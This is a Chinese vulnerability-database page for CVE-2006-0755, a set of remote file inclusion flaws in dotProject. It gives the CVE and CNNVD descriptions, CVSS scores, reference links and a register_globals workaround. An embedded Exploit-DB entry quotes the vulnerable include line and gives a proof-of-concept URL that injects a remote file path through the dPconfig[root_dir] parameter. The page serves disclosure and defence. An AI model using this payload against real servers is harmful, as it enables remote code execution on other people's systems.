CVE-2006-0755
CVSS5.1
发布时间 :2006-02-17 21:02:00
修订时间 :2011-03-07 21:30:46
NMCOE    

[原文]** DISPUTED ** Multiple PHP remote file include vulnerabilities in dotProject 2.0.1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary commands via the baseDir parameter in (1) db_adodb.php, (2) db_connect.php, (3) session.php, (4) vw_usr_roles.php, (5) calendar.php, (6) date_format.php, and (7) tasks/gantt.php; and the dPconfig[root_dir] parameter in (8) projects/gantt.php, (9) gantt2.php, and (10) vw_files.php. NOTE: the vendor disputes this issue, stating that the product documentation clearly recommends that the system administrator disable register_globals, and that the check.php script warns against this setting. Also, the vendor says that the protection.php/siteurl vector is incorrect because protection.php does not exist in the product.


[CNNVD]Dotproject多个远程文件包含漏洞(CNNVD-200602-266)

        dotproject是一个PHP+MySql编写的beta级基于web的项目管理和跟踪工具。
        dotproject实现上存在多个输入验证漏洞,远程攻击者可能利用这些漏洞在系统上执行任意命令。
        dotproject的protection.php脚本没有正确地验证siteurl参数中的用户输入,因此攻击者可以通过eval()包含远程PHP文件并执行任意PHP代码。此外,还有一些路径泄露漏洞。如果使用baseDir=foobar参数直接访问的话,几乎所有/db/中的文件都可能出现一些可利用的php错误。如果没有删除/doc/目录的话(默认配置),就可以访问以下两个文件泄漏系统信息:
        1) /docs/phpinfo.php - phpinfo()文件
        2) /docs/check.php - 有关所安装的dotProject的信息

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:dotproject:dotproject:2.0
cpe:/a:dotproject:dotproject:2.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0755
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0755
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-266
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/24738
(UNKNOWN)  XF  dotproject-multiple-basedir-file-include(24738)
http://www.vupen.com/english/advisories/2006/0604
(UNKNOWN)  VUPEN  ADV-2006-0604
http://www.securityfocus.com/bid/16648
(UNKNOWN)  BID  16648
http://www.securityfocus.com/archive/1/archive/1/424957/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060214 dotproject <= 2.0.1 remote code execution
http://www.securityfocus.com/archive/1/425285/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060215 Re: dotproject <= 2.0.1 remote code execution
http://www.osvdb.org/23219
(UNKNOWN)  OSVDB  23219
http://www.osvdb.org/23218
(UNKNOWN)  OSVDB  23218
http://www.osvdb.org/23217
(UNKNOWN)  OSVDB  23217
http://www.osvdb.org/23216
(UNKNOWN)  OSVDB  23216
http://www.osvdb.org/23215
(UNKNOWN)  OSVDB  23215
http://www.osvdb.org/23214
(UNKNOWN)  OSVDB  23214
http://www.osvdb.org/23213
(UNKNOWN)  OSVDB  23213
http://www.osvdb.org/23212
(UNKNOWN)  OSVDB  23212
http://www.osvdb.org/23211
(UNKNOWN)  OSVDB  23211
http://www.osvdb.org/23210
(UNKNOWN)  OSVDB  23210
http://www.osvdb.org/23209
(UNKNOWN)  OSVDB  23209
http://secunia.com/advisories/18879
(VENDOR_ADVISORY)  SECUNIA  18879

- 漏洞信息

Dotproject多个远程文件包含漏洞
中危 输入验证
2006-02-17 00:00:00 2006-03-02 00:00:00
远程  
        dotproject是一个PHP+MySql编写的beta级基于web的项目管理和跟踪工具。
        dotproject实现上存在多个输入验证漏洞,远程攻击者可能利用这些漏洞在系统上执行任意命令。
        dotproject的protection.php脚本没有正确地验证siteurl参数中的用户输入,因此攻击者可以通过eval()包含远程PHP文件并执行任意PHP代码。此外,还有一些路径泄露漏洞。如果使用baseDir=foobar参数直接访问的话,几乎所有/db/中的文件都可能出现一些可利用的php错误。如果没有删除/doc/目录的话(默认配置),就可以访问以下两个文件泄漏系统信息:
        1) /docs/phpinfo.php - phpinfo()文件
        2) /docs/check.php - 有关所安装的dotProject的信息

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本。
        http://www.dotproject.net

- 漏洞信息 (22708)

dotProject <= 2.1.6 Remote File Inclusion Vulnerability (EDBID:22708)
php webapps
2012-11-14 Verified
0 dun
[点击下载] [点击下载]
:::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ posdub[at]gmail.com ]
   [ 2012-11-13                              ]
 #################################################################
 #  [ dotProject <= 2.1.6 ] Remote File Inclusion Vulnerability  #
 #################################################################
 #
 # Script: "PHP web-based project management framework that includes modules for companies,
 #          projects, tasks (with Gantt charts), forums, files, calendar, contacts, tickets/helpdesk,
 #          multi-language support, user/module permissions and themes"
 #
 # Vendor:   http://www.dotproject.net/
 # Download: http://sourceforge.net/projects/dotproject/files/dotproject/dotProject%20Version%202.1.6/
 #
 #################################################################
 #
 # [ Remote File Inclusion ] ( allow_url_include = On; register_globals = On; )
 #
 # File: dotproject/modules/projectdesigner/gantt.php ( line: 8 ):
 # ..cut..
 # include ($dPconfig['root_dir'].'/lib/jpgraph/src/jpgraph.php');
 # ..cut..
 #
 # Vuln: http://localhost/dotproject/modules/projectdesigner/gantt.php?dPconfig[root_dir]=http://localhost/info.txt?
 #
 ### [ dun / 2012 ] #############################################		

- 漏洞信息

23210
dotProject /includes/db_adodb.php baseDir Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

dotProject contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to /includes/db_adodb.php not properly sanitizing user input supplied to the 'baseDir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-02-14 2006-01-24
Unknow Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: turn the register_globals PHP option to 'off'.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站